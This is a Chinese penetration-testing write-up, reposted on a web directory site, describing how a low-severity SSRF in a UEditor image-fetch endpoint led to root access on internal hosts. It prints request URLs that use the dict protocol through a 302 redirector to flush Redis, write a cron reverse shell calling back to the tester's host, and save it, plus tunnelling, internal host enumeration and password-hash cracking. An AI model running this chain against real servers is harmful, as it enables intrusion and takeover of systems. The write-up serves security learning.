亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.430618.com 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

**Github地址:https://github.com/r35tart/PenetrationTestingCase

-----------------------------------------------------漏洞詳情:**低危SSRF漏洞

漏洞域名:http://xxxxxxxxx.*.com打開后自動跳轉(zhuǎn)至:http://xxxxxxx.*.com/Public/login且狀態(tài)碼為404 一般這樣的URI憑經(jīng)驗感覺是php的站,查看cookies基本可以確定是php的站

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

由于是404推測曾經(jīng)可能跑過測試應(yīng)用網(wǎng)站可能會遺留一些測試文件或者備份文件,故fuzz了一下看到phpmyadmin的狀態(tài)碼為206的時候就知道有WAF,應(yīng)該不太好弄,但是看到ueditor百度編輯器的時候興奮了,因為這很有可能存在SSRF,而你們的內(nèi)網(wǎng)又那么大,搞不好還在我上次搞過的內(nèi)網(wǎng)段中,所以如果存在SSRF的話有很大概率能夠再次搞進內(nèi)網(wǎng)。

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

幾經(jīng)測試最終找到此SSRF并成功觸發(fā)

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

低危漏洞提權(quán)接下來要做的事

1. 摸清SSRF的狀態(tài)是否為布爾狀態(tài)

2. 此SSRF支持什么協(xié)議

3. 此SSRF是否支持302跳轉(zhuǎn)

一、嘗試請求一個沒開放的1234端口回復(fù)"鏈接不可用"

二、嘗試請求開放的22端口回顯"鏈接不可用"

三、嘗試請求開放的80端口回顯"success"并把圖片抓了回來

四、嘗試請求我的302跳轉(zhuǎn)回復(fù)"鏈接不可用"但是跳轉(zhuǎn)成功。得出結(jié)論:

此SSRF為布爾型SSRF,能探測http應(yīng)用并獲取html源碼、支持302跳轉(zhuǎn),可嘗試通過響應(yīng)速度來探測端口但誤報率很高(某些端口可能是一直連接,最后超時)

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

知道此SSRF的性質(zhì)以后便需要開始測試他支持什么協(xié)議了,經(jīng)測試發(fā)現(xiàn)由于使用的php版本比較老支持好幾個協(xié)議,使用gopher協(xié)議的時候狀態(tài)為206提示有WAF,但WAF卻沒攔截DICT協(xié)議,雖然gopher協(xié)議有WAF攔截但是支持DCIT的話一樣可以掃描內(nèi)網(wǎng)redis寫shell反彈,只不過相對麻煩而已,并不礙事。

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

現(xiàn)在有一個問題就是我并不知道內(nèi)網(wǎng)IP段是多少,于是我便去Github上面去找內(nèi)網(wǎng)域名,找到以下內(nèi)網(wǎng)域名gitlab.corp.*.com、jk.corp.*.com、wiki.corp.*.com等… 并通過SSRF請求jk.corp.*.com從中獲取到了內(nèi)網(wǎng)IP信息

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

然后就開始嘗試內(nèi)網(wǎng)編織大致摸清了幾個網(wǎng)段的分布和作用(根據(jù)logo識別應(yīng)用)

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 


只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

最后發(fā)現(xiàn)88段應(yīng)該為脆弱的開發(fā)業(yè)務(wù)段,根據(jù)之前搞了你們另外一個內(nèi)網(wǎng)的經(jīng)驗,斷定此段必定存在多個redis數(shù)據(jù)庫而且還是空口令的,于是使用dict協(xié)議往10.20.85-95.1/24段發(fā)redis寫shell的請求

使用dict協(xié)議向Redis數(shù)據(jù)庫寫shell

1.先清除沒用的數(shù)據(jù),防止定時任務(wù)執(zhí)行失敗

/php/controller.php?action=catchimage&source[]=http://xxxx/302.php?s=dict%26ip=10.20.*.*%26port=6379%26data=flushall

2.利用302跳轉(zhuǎn)寫入反彈命令

/php/controller.php?action=catchimage&source[]=http://xxxx/s.php?s=dict%26ip=10.20.*.*%26port=6379%26bhost=*.*.*.*%26bport=1234

3.設(shè)置導(dǎo)出路徑

/php/controller.php?action=catchimage&source[]=http://xxxx/302.php?s=dict%26ip=10.20.*.*%26port=6379%26data=config:set:dir:/var/spool/cron/

4.設(shè)置導(dǎo)出名字

/php/controller.php?action=catchimage&source[]=http://xxxx/302.php?s=dict%26ip=10.20.*.*%26port=6379%26data=config:set:dbfilename:root

5.導(dǎo)出

/php/controller.php?action=catchimage&source[]=http://xxxx/302.php?s=dict%26ip=10.20.*.*%26port=6379%26data=save

使用burp發(fā)包,為了避免語句順序執(zhí)行錯誤,故第一個包先跑50個再跑第二個包以此類推

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

獲取內(nèi)網(wǎng)多臺ROOT權(quán)限

使用nc持續(xù)監(jiān)聽端口,剛剛?cè)颗芡犟R上就有差不多15臺左右主機反彈出來了而且都是root權(quán)限

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

在其中一臺內(nèi)網(wǎng)一臺云服中發(fā)現(xiàn)了多個數(shù)據(jù)庫并發(fā)現(xiàn)了f**p的相關(guān)業(yè)務(wù)

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 


只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

89段office辦公主機 跑著***系統(tǒng)

滲透內(nèi)網(wǎng)!

嘗試打socket隧道出來

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

內(nèi)網(wǎng)探測

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

使用ew打的socke隧道經(jīng)常出問題,于是把自己寫的內(nèi)網(wǎng)探測腳本丟到服務(wù)器上跑了起來,只挑了幾個重要的核心網(wǎng)段跑

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 


只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

發(fā)現(xiàn)172網(wǎng)段是 http://www.***.com/ 所在的業(yè)務(wù)段為了更加快速的定位到重要網(wǎng)段,我對內(nèi)網(wǎng)域名進行了爆破并查看他們的解析地址

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

who.corp.*.com (10.20.95.89)

gongdan.corp.*.com (10.100.100.204)

work.corp.*.com (10.100.75.25)

jk.corp.*.com (10.20.95.86)

baize.corp.*.com (172.31.80.151)

asset.corp.*.com (10.20.95.50)

pm.corp.*.com (10.20.95.29)

wiki.corp.*.com (10.20.95.87)

cms.corp.*.com (172.31.80.101)

…….

本帖隱藏的內(nèi)容需要積分高于 1000 才可瀏覽

抓了幾個shadow的密碼跑了一下 發(fā)現(xiàn)弱口令挺多的

只用個低危SSRF提權(quán)就能進內(nèi)網(wǎng)

 

一堆平臺只是打開看了一下,并沒有進一步操作

滲透到這里就該結(jié)束了,本想著下一步先使用metasploit打兩臺window后嘗試拿域控的,因為比較難遇到這樣的實戰(zhàn)環(huán)境,但還是沒有進行進一步操作,點到為止。此漏洞從周四晚上八九點發(fā)現(xiàn)低危SSRF到拿到內(nèi)網(wǎng)ROOT權(quán)限用了不到三個小時時間,但是由于waf 和ids等設(shè)備的阻攔打socks隧道花了我將近兩倍拿shell 的時間,最終發(fā)現(xiàn)不穩(wěn)定的原因是我的nc -k參數(shù)持續(xù)監(jiān)聽了端口,導(dǎo)致內(nèi)網(wǎng)十幾臺redis數(shù)據(jù)庫都在同時請求我的端口上線,我想執(zhí)行一條命令,將會同時在這十幾臺上線的主機上同時執(zhí)行,這導(dǎo)致了我的socke端口堵塞,最后解決辦法是,不用-k參數(shù),當一臺主機上線后,不接受其他主機上線請求。然后操作這臺主機使用sSocks 再打一條相對穩(wěn)定的socks隧道出來,直入內(nèi)網(wǎng),不得不說sSocks相比EW穩(wěn)得一批。

結(jié)束語:

任何嚴重漏洞的背后必然是從一個不起眼的沒什么技術(shù)含量的容易被忽略的漏洞引起的,做好細微漏洞的防范的能防止重大信息安全事故的發(fā)生。

分享到:
標簽:SSRF 提權(quán)
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定